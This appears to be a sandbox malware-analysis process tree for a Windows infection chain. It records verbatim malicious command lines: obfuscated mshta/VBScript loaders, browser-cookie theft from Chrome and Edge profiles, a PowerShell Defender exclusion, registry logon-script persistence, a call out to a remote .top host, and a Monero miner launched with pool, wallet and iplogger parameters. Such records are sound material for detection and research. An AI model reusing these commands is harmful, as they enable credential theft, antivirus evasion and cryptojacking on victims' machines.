C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\G0PS2zVnoL.bat"4⤵
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:25⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\DscTimer\lsass.exe"C:\Windows\System32\DscTimer\lsass.exe"5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵
-
C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe"C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe"C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe"3⤵
-
C:\Users\Admin\Documents\mgBOJpLraGK2Wlg_GsNS8POH.exe"C:\Users\Admin\Documents\mgBOJpLraGK2Wlg_GsNS8POH.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe"C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\zGFs3qgZ52GcHMqEBczEQ9x9.exe"C:\Users\Admin\Documents\zGFs3qgZ52GcHMqEBczEQ9x9.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe"C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe"C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe" -q3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe"C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\sbqPAgkI_05eWSEnnOqyIFuT.exe"C:\Users\Admin\Documents\sbqPAgkI_05eWSEnnOqyIFuT.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,s C:\Users\Admin\DOCUME~1\SBQPAG~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,ZhNTTzM=4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL5⤵
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,dlQhRA==5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp60CB.tmp.ps1"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\ySzhlkxv6lvVdaZGAMZc3MjG.exe"C:\Users\Admin\Documents\ySzhlkxv6lvVdaZGAMZc3MjG.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6923⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 10763⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\3bddbg9jWr7Ig8wwsIl8rRbl.exe"C:\Users\Admin\Documents\3bddbg9jWr7Ig8wwsIl8rRbl.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe") do taskkill -IM "%~nXW" -f1⤵
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu92⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f4⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "Xq_nEPqQVaJIj4O11jOJH7Fl.exe" -f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-H19HE.tmp\3bddbg9jWr7Ig8wwsIl8rRbl.tmp"C:\Users\Admin\AppData\Local\Temp\is-H19HE.tmp\3bddbg9jWr7Ig8wwsIl8rRbl.tmp" /SL5="$2025C,138429,56832,C:\Users\Admin\Documents\3bddbg9jWr7Ig8wwsIl8rRbl.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-PJAK3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PJAK3.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im runvd.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-62PIN.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-62PIN.tmp\Inlog.tmp" /SL5="$20312,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-NQLVI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NQLVI.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7215⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UV2V5.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-UV2V5.tmp\Setup.tmp" /SL5="$2047E,17344747,721408,C:\Users\Admin\AppData\Local\Temp\is-NQLVI.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7216⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\microsoft.cab -F:* %ProgramData%7⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\microsoft.cab -F:* C:\ProgramData8⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\vdi_compiler"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\vdi_compiler.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 49⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7217⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"7⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548201 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"4⤵
- Enumerates connected drives
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IVF63.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-IVF63.tmp\MediaBurner2.tmp" /SL5="$1033E,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V6PHP.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-V6PHP.tmp\ultradumnibour.exe" /S /UID=burnerch25⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe"C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G1SMF.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-G1SMF.tmp\ultramediaburner.tmp" /SL5="$20656,281924,62464,C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe" /VERYSILENT7⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu8⤵
-
C:\Users\Admin\AppData\Local\Temp\5b-43086-d4b-c22b8-fce0920750d49\SHilapajigae.exe"C:\Users\Admin\AppData\Local\Temp\5b-43086-d4b-c22b8-fce0920750d49\SHilapajigae.exe"6⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\3f-79b60-b68-1b894-b78c8cd4fb1fd\Gyherohyno.exe"C:\Users\Admin\AppData\Local\Temp\3f-79b60-b68-1b894-b78c8cd4fb1fd\Gyherohyno.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tzjfftdw.git\GcleanerEU.exe /eufive & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\tzjfftdw.git\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\tzjfftdw.git\GcleanerEU.exe /eufive8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wzw5sav.qjr\installer.exe /qn CAMPAIGN="654" & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\3wzw5sav.qjr\installer.exeC:\Users\Admin\AppData\Local\Temp\3wzw5sav.qjr\installer.exe /qn CAMPAIGN="654"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlyg1knd.2iq\ufgaa.exe & exit7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exeC:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe"C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe" -q9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0sk0hr4.v04\gcleaner.exe /mixfive & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\j0sk0hr4.v04\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j0sk0hr4.v04\gcleaner.exe /mixfive8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w45m2l25.oyg\autosubplayer.exe /S & exit7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9JQJN.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-9JQJN.tmp\WEATHER Manager.tmp" /SL5="$1032A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7155⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548201 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-G08L3.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-G08L3.tmp\Stats.tmp" /SL5="$20310,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-IDKM4.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-IDKM4.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RJG0B.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJG0B.tmp\VPN.tmp" /SL5="$4027A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CB84U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-CB84U.tmp\Setup.exe" /silent /subid=7205⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RQ3PP.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-RQ3PP.tmp\Setup.tmp" /SL5="$30270,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-CB84U.tmp\Setup.exe" /silent /subid=7206⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "7⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09018⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "7⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09018⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4752940.exe"C:\Users\Admin\AppData\Roaming\4752940.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\5398377.exe"C:\Users\Admin\AppData\Roaming\5398377.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\8242401.exe"C:\Users\Admin\AppData\Roaming\8242401.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\1524948.exe"C:\Users\Admin\AppData\Roaming\1524948.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\7239412.exe"C:\Users\Admin\AppData\Roaming\7239412.exe"4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\uQ1sY0V9BPG6y1BJhAoaX8hC.exe"C:\Users\Admin\Documents\uQ1sY0V9BPG6y1BJhAoaX8hC.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 4805⤵
- Program crash
-
C:\Users\Admin\Documents\YRi2dUdNOfV42ivfdf3KhaJC.exe"C:\Users\Admin\Documents\YRi2dUdNOfV42ivfdf3KhaJC.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "YRi2dUdNOfV42ivfdf3KhaJC.exe" /f & erase "C:\Users\Admin\Documents\YRi2dUdNOfV42ivfdf3KhaJC.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "YRi2dUdNOfV42ivfdf3KhaJC.exe" /f6⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\lV0cLJRjBoCNp3_nrE9Ro2WP.exe"C:\Users\Admin\Documents\lV0cLJRjBoCNp3_nrE9Ro2WP.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\rRzYjitRkR6jBplorkkpKLg9.exe"C:\Users\Admin\Documents\rRzYjitRkR6jBplorkkpKLg9.exe"4⤵
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\ZZ6GYPrzOB779rzI1ngINoXX.exe"C:\Users\Admin\Documents\ZZ6GYPrzOB779rzI1ngINoXX.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
